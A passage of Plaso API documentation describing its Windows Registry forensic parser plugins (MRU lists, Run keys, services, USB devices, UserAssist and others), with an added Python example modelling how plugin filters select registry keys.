            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({})

    NAME = 'mrulist_shell_item_list'

class plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilter
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter

    Windows Registry key with values filter.

    Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters:
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns: True if the Windows Registry key matches the filter.

        Return type: bool

class plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin

    Windows Registry plugin to parse a string MRUList.

    DATA_FORMAT = 'Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({})

    NAME = 'mrulist_string'

plaso.parsers.winreg_plugins.mrulistex module

This file contains MRUListEx Windows Registry plugins.

Also see: https://github.com/libyal/winreg-kb/blob/main/documentation/MRU%20keys.asciidoc

class plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Class for common MRUListEx Windows Registry plugin functionality.

class plaso.parsers.winreg_plugins.mrulistex.MRUListExEventData
    Bases: plaso.containers.events.EventData

    MRUListEx event data attribute container.

    entries
        most recently used (MRU) entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:mrulistex'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

    Windows Registry plugin to parse a shell item list MRUListEx.

    DATA_FORMAT = 'Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({, })

    NAME = 'mrulistex_shell_item_list'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

    Windows Registry plugin to parse a string and shell item list MRUListEx.

    DATA_FORMAT = 'Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({})

    NAME = 'mrulistex_string_and_shell_item_list'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

    Windows Registry plugin to parse a string and shell item MRUListEx.

    DATA_FORMAT = 'Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({})

    NAME = 'mrulistex_string_and_shell_item'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilter
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter

    Windows Registry key with values filter.

    Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters:
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns: True if the Windows Registry key matches the filter.

        Return type: bool

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

    Windows Registry plugin to parse a string MRUListEx.

    DATA_FORMAT = 'Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({})

    NAME = 'mrulistex_string'

plaso.parsers.winreg_plugins.msie_zones module

This file contains the MSIE zone settings plugin.

class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventData
    Bases: plaso.containers.events.EventData

    MSIE zone settings event data attribute container.

    key_path
        Windows Registry key path.
        Type: str

    settings
        MSIE zone settings.
        Type: str

    DATA_TYPE = 'windows:registry:msie_zone_settings'

class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for parsing the MSIE zone settings.

    The MSIE Feature controls are stored in the Zone specific subkeys in:

        Internet Settings\Zones key
        Internet Settings\Lockdown_Zones key

    Also see: http://support.microsoft.com/kb/182569

    DATA_FORMAT = 'Microsoft Internet Explorer zone settings Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, , , })

    NAME = 'msie_zone'

plaso.parsers.winreg_plugins.network_drives module

This file contains the Network drive Registry plugin.

class plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData
    Bases: plaso.containers.events.EventData

    Network drive event data attribute container.

    drive_letter
        drive letter assigned to network drive.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    server_name
        name of the server of the network drive.
        Type: str

    share_name
        name of the share of the network drive.
        Type: str

    DATA_TYPE = 'windows:registry:network_drive'

class plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for parsing the Network key.

    DATA_FORMAT = 'Windows network drives Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'network_drives'

plaso.parsers.winreg_plugins.networks module

This file contains the NetworkList Registry plugin.

class plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Windows Registry plugin for parsing the NetworkList key.

    DATA_FORMAT = 'Windows networks (NetworkList) Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'networks'

class plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventData
    Bases: plaso.containers.events.EventData

    Windows NetworkList event data.

    connection_type
        type of connection.
        Type: str

    default_gateway_mac
        MAC address for the default gateway.
        Type: str

    description
        description of the wireless connection.
        Type: str

    dns_suffix
        DNS suffix.
        Type: str

    ssid
        SSID of the connection.
        Type: str

    DATA_TYPE = 'windows:registry:network'

plaso.parsers.winreg_plugins.officemru module

Windows Registry plugin for the Microsoft Office MRU.

class plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventData
    Bases: plaso.containers.events.EventData

    Microsoft Office MRU list Windows Registry event data.

    entries
        most recently used (MRU) entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:office_mru_list'

class plaso.parsers.winreg_plugins.officemru.OfficeMRUPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Plugin that parses Microsoft Office MRU keys.

    DATA_FORMAT = 'Microsoft Office MRU Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, , , , , , , })

    NAME = 'microsoft_office_mru'

class plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventData
    Bases: plaso.containers.events.EventData

    Microsoft Office MRU Windows Registry event data.

    key_path
        Windows Registry key path.
        Type: str

    value_string
        MRU value.
        Type: str

    DATA_TYPE = 'windows:registry:office_mru'

plaso.parsers.winreg_plugins.outlook module

This file contains an Outlook search MRU Registry parser.

class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventData
    Bases: plaso.containers.events.EventData

    Outlook search MRU event data attribute container.

    entries
        most recently used (MRU) entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:outlook_search_mru'

class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin parsing Outlook Search MRU keys.

    DATA_FORMAT = 'Microsoft Outlook search MRU Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, })

    NAME = 'microsoft_outlook_mru'

plaso.parsers.winreg_plugins.programscache module

Windows Registry plugin to parse the Explorer ProgramsCache key.

class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventData
    Bases: plaso.containers.events.EventData

    Explorer ProgramsCache event data attribute container.

    entries
        entries in the program cache.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    known_folder_identifier
        known folder identifier.
        Type: str

    value_name
        Windows Registry value name.
        Type: str

    DATA_TYPE = 'windows:registry:explorer:programcache'

class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Class that parses the Explorer ProgramsCache Registry data.

    DATA_FORMAT = 'Windows Explorer Programs Cache Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, })

    NAME = 'explorer_programscache'

plaso.parsers.winreg_plugins.run module

This file contains the Run/RunOnce key plugins for Plaso.

class plaso.parsers.winreg_plugins.run.AutoRunsPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for parsing user specific auto runs.

    Also see: http://msdn.microsoft.com/en-us/library/aa376977(v=vs.85).aspx

    DATA_FORMAT = 'Run and run once Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, , , , , , })

    NAME = 'windows_run'

class plaso.parsers.winreg_plugins.run.RunKeyEventData
    Bases: plaso.containers.events.EventData

    Run/RunOnce key event data attribute container.

    entries
        Run/RunOnce entries.
        Type: list[str]

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:run'
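Every plugin in this package follows the interface documented in plaso.parsers.winreg_plugins.interface above: FILTERS is a frozenset of key filters whose Match() decides whether the plugin is handed a key at all, Process() raises ValueError when the key is not set and otherwise calls ExtractEvents(), and ExtractEvents() hands event data with a fixed DATA_TYPE to the parser mediator. The following Python model is an added example, not Plaso's own code: it re-implements that dispatch on stand-in objects for the Run/RunOnce plugin above and for the "keys having Type and Start" rule of the services plugin. The RegistryKey and EventData stand-ins, the process_key dispatcher, the use of a plain list as parser mediator, and the sample key paths and values are all assumptions made for this example.

```python
# Added example (not Plaso's code): a model of how Plaso's Windows Registry
# plugins are selected for a key and turn it into event data.
from dataclasses import dataclass, field
from typing import Dict

@dataclass
class RegistryKey:
    """Stand-in for dfwinreg.WinRegistryKey (assumption): path and name->data values."""
    path: str
    values: Dict[str, str] = field(default_factory=dict)

@dataclass
class EventData:  # stand-in for plaso.containers.events.EventData (assumption)
    data_type: str
    key_path: str
    attributes: Dict[str, object]

class WindowsRegistryKeyPathSuffixFilter:
    """Matches a key whose path ends with the configured suffix."""

    def __init__(self, key_path_suffix):
        self._key_path_suffix = key_path_suffix

    def Match(self, registry_key):
        return registry_key.path.endswith(self._key_path_suffix)

class WindowsRegistryKeyWithValuesFilter:
    """Matches a key that carries every one of the configured value names."""

    def __init__(self, value_names):
        self._value_names = frozenset(value_names)

    def Match(self, registry_key):
        return self._value_names.issubset(registry_key.values)

class WindowsRegistryPlugin:
    """The interface: FILTERS gate the key, ExtractEvents does the work."""
    NAME = 'winreg_plugin'
    FILTERS = frozenset()

    def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
        raise NotImplementedError

    def Process(self, parser_mediator, registry_key, **kwargs):
        if registry_key is None:  # the documented ValueError contract
            raise ValueError('Windows Registry key is not set.')
        self.ExtractEvents(parser_mediator, registry_key, **kwargs)

class RunPlugin(WindowsRegistryPlugin):
    """One windows:registry:run event per Run/RunOnce key, one entry per value."""
    NAME = 'windows_run'
    FILTERS = frozenset([
        WindowsRegistryKeyPathSuffixFilter('\\Microsoft\\Windows\\CurrentVersion\\Run'),
        WindowsRegistryKeyPathSuffixFilter('\\Microsoft\\Windows\\CurrentVersion\\RunOnce')])

    def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
        entries = ['{0:s}: {1:s}'.format(name, data)
                   for name, data in registry_key.values.items()]
        parser_mediator.append(EventData(
            'windows:registry:run', registry_key.path, {'entries': entries}))

class ServicesPlugin(WindowsRegistryPlugin):
    """Service and driver keys are recognised by carrying Type and Start values."""
    NAME = 'windows_services'
    FILTERS = frozenset([WindowsRegistryKeyWithValuesFilter(['Type', 'Start'])])

    def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
        parser_mediator.append(EventData('windows:registry:service', registry_key.path, {
            'name': registry_key.path.rsplit('\\', 1)[-1],
            'service_type': int(registry_key.values['Type']),
            'start_type': int(registry_key.values['Start'])}))

def process_key(plugins, registry_key, parser_mediator):
    """Runs every plugin with a matching filter; returns the names that ran."""
    ran = []
    for plugin in plugins:
        if any(key_filter.Match(registry_key) for key_filter in plugin.FILTERS):
            plugin.Process(parser_mediator, registry_key)
            ran.append(plugin.NAME)
    return ran

# Constructed sample keys (not from a real image); a plain list stands in for
# the ParserMediator that collects the event data (assumption).
SAMPLE_KEYS = [
    RegistryKey('HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
                {'OneDrive': 'C:\\Users\\analyst\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background'}),
    RegistryKey('HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Dhcp',
                {'Type': '32', 'Start': '2', 'ImagePath': 'svchost.exe -k LocalServiceNetworkRestricted'}),
    RegistryKey('HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths')]

def demo():
    """Dispatches the sample keys; returns (plugin names run per key path, events)."""
    events = []
    plugins = [RunPlugin(), ServicesPlugin()]
    ran = {key.path: process_key(plugins, key, events) for key in SAMPLE_KEYS}
    return ran, events
```

Calling demo() shows the Run key and the Dhcp service key each reaching exactly one plugin while the TypedPaths key reaches none: a key is only parsed when some filter in a plugin's FILTERS accepts it, so in this model a plugin whose FILTERS is empty never runs, and the with-values filter lets the services plugin match any key under Services without knowing its name in advance.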

plaso.parsers.winreg_plugins.sam_users module

Windows Registry plugin for SAM Users Account information.

class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData
    Bases: plaso.containers.events.EventData

    Class that defines SAM users Windows Registry event data.

    account_rid
        account relative identifier (RID).
        Type: int

    comments
        comments.
        Type: str

    fullname
        full name.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    login_count
        login count.
        Type: int

    username
        a string containing the username.
        Type: str

    DATA_TYPE = 'windows:registry:sam_users'

class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Windows Registry plugin for SAM Users Account information.

    DATA_FORMAT = 'Security Accounts Manager (SAM) users Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_sam_users'

plaso.parsers.winreg_plugins.services module

Windows drivers and services Registry key parser plugin.

class plaso.parsers.winreg_plugins.services.ServicesPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Plug-in to format the Services and Drivers keys having Type and Start.

    DATA_FORMAT = 'Windows drivers and services Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_services'

class plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData
    Bases: plaso.containers.events.EventData

    Windows Registry driver or service event data attribute container.

    error_control
        error control value of the Windows driver or service executable.
        Type: int

    image_path
        path of the Windows driver or service executable.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    name
        name of the Windows driver or service.
        Type: str

    object_name
        Windows service object name.
        Type: str

    service_dll
        Windows service DLL.
        Type: str

    service_type
        Windows driver or service type.
        Type: int

    start_type
        Device or service start type.
        Type: int

    values
        names and data of additional values in the key.
        Type: str

    DATA_TYPE = 'windows:registry:service'

plaso.parsers.winreg_plugins.shutdown module

Windows Registry plugin for parsing the last shutdown time of a system.

class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventData
    Bases: plaso.containers.events.EventData

    Shutdown Windows Registry event data.

    key_path
        Windows Registry key path.
        Type: str

    value_name
        name of the Windows Registry value.
        Type: str

    DATA_TYPE = 'windows:registry:shutdown'

class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Windows Registry plugin for parsing the last shutdown time of a system.

    DATA_FORMAT = 'Windows last shutdown Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a ShutdownTime Windows Registry value.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_shutdown'

plaso.parsers.winreg_plugins.task_scheduler module

This file contains the Task Scheduler Registry keys plugins.

class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheEventData
    Bases: plaso.containers.events.EventData

    Task Cache event data.

    key_path
        Windows Registry key path.
        Type: str

    task_name
        name of the task.
        Type: str

    task_identifier
        identifier of the task.
        Type: str

    DATA_TYPE = 'task_scheduler:task_cache:entry'

class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Plugin that parses a Task Cache key.

    DATA_FORMAT = 'Windows Task Scheduler cache Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_task_cache'

plaso.parsers.winreg_plugins.terminal_server module

This file contains the Terminal Server client Windows Registry plugins.

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventData
    Bases: plaso.containers.events.EventData

    Terminal Server client connection event data attribute container.

    entries
        most recently used (MRU) entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    username
        username, provided by the UsernameHint value.
        Type: str

    DATA_TYPE = 'windows:registry:mstsc:connection'

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventData
    Bases: plaso.containers.events.EventData

    Terminal Server client MRU event data attribute container.

    entries
        most recently used (MRU) entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:mstsc:mru'

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for Terminal Server Client Connection MRUs keys.

    DATA_FORMAT = 'Terminal Server Client Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Terminal Server Client MRU Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, })

    NAME = 'mstsc_rdp_mru'

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for Terminal Server Client Connection keys.

    DATA_FORMAT = 'Terminal Server Client Connection Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Terminal Server Client Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, })

    NAME = 'mstsc_rdp'

plaso.parsers.winreg_plugins.timezone module

Plug-in to collect information about the Windows timezone settings.

class plaso.parsers.winreg_plugins.timezone.WinRegTimezonePlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Plug-in to collect information about the Windows timezone settings.

    DATA_FORMAT = 'Windows time zone Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_timezone'

class plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventData
    Bases: plaso.containers.events.EventData

    Timezone settings event data attribute container.

    configuration
        timezone configuration.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:timezone'

plaso.parsers.winreg_plugins.typedurls module

File containing a Windows Registry plugin to parse the typed URLs key.

class plaso.parsers.winreg_plugins.typedurls.TypedURLsEventData
    Bases: plaso.containers.events.EventData

    Typed URLs event data attribute container.

    entries
        typed URLs or paths entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:typedurls'

class plaso.parsers.winreg_plugins.typedurls.TypedURLsPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    A Windows Registry plugin for typed URLs history.

    DATA_FORMAT = 'Windows Explorer typed URLs Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, })

    NAME = 'windows_typed_urls'

plaso.parsers.winreg_plugins.usb module

File containing a Windows Registry plugin to parse the USB Device key.

class plaso.parsers.winreg_plugins.usb.USBPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    USB Windows Registry plugin for last connection time.

    Also see: https://msdn.microsoft.com/en-us/library/windows/hardware/jj649944%28v=vs.85%29.aspx

    DATA_FORMAT = 'Windows USB device Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_usb_devices'

class plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventData
    Bases: plaso.containers.events.EventData

    Windows USB device event data attribute container.

    key_path
        Windows Registry key path.
        Type: str

    product
        product of the USB device.
        Type: str

    serial
        serial number of the USB device.
        Type: str

    subkey_name
        name of the Windows Registry subkey.
        Type: str

    vendor
        vendor of the USB device.
        Type: str

    DATA_TYPE = 'windows:registry:usb'

plaso.parsers.winreg_plugins.usbstor module

File containing a Windows Registry plugin to parse the USBStor key.

class plaso.parsers.winreg_plugins.usbstor.USBStorEventData
    Bases: plaso.containers.events.EventData

    USBStor event data attribute container.

    device_type
        type of USB device.
        Type: str

    display_name
        display name of the USB device.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    parent_id_prefix
        parent identifier prefix of the USB device.
        Type: str

    product
        product of the USB device.
        Type: str

    serial
        serial number of the USB device.
        Type: str

    revision
        revision number of the USB device.
        Type: str

    subkey_name
        name of the Windows Registry subkey.
        Type: str

    vendor
        vendor of the USB device.
        Type: str

    DATA_TYPE = 'windows:registry:usbstor'

class plaso.parsers.winreg_plugins.usbstor.USBStorPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    USBStor key plugin.

    Also see: https://forensicswiki.xyz/wiki/index.php?title=USB_History_Viewing

    DATA_FORMAT = 'Windows USB Plug And Play Manager USBStor Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_usbstor_devices'

plaso.parsers.winreg_plugins.userassist module

The UserAssist Windows Registry plugin.

class plaso.parsers.winreg_plugins.userassist.UserAssistPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Plugin that parses a UserAssist key.

    DATA_FORMAT = 'User Assist Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({, , , , , , , , , , , })

    NAME = 'userassist'

class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData
    Bases: plaso.containers.events.EventData

    UserAssist Windows Registry event data.

    application_focus_count
        application focus count.
        Type: int

    application_focus_duration
        application focus duration.
        Type: int

    entry_index
        entry index.
        Type: int

    key_path
        Windows Registry key path.
        Type: str

    number_of_executions
        number of executions.
        Type: int

    value_name
        name of the Windows Registry value.
        Type: str

    DATA_TYPE = 'windows:registry:userassist'

class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter(user_assist_guid)
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter

    UserAssist Windows Registry key path filter.

plaso.parsers.winreg_plugins.windows_version module

Plug-in to collect information about the Windows version.

class plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData
    Bases: plaso.containers.events.EventData

    Windows installation event data attribute container.

    build_number
        Windows build number.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    owner
        registered owner.
        Type: str

    product_name
        product name.
        Type: str

    service_pack
        service pack.
        Type: str

    version
        Windows version.
        Type: str

    DATA_TYPE = 'windows:registry:installation'

class plaso.parsers.winreg_plugins.windows_version.WindowsVersionPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Plug-in to collect information about the Windows version.

    DATA_FORMAT = 'Windows version (product) Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_version'

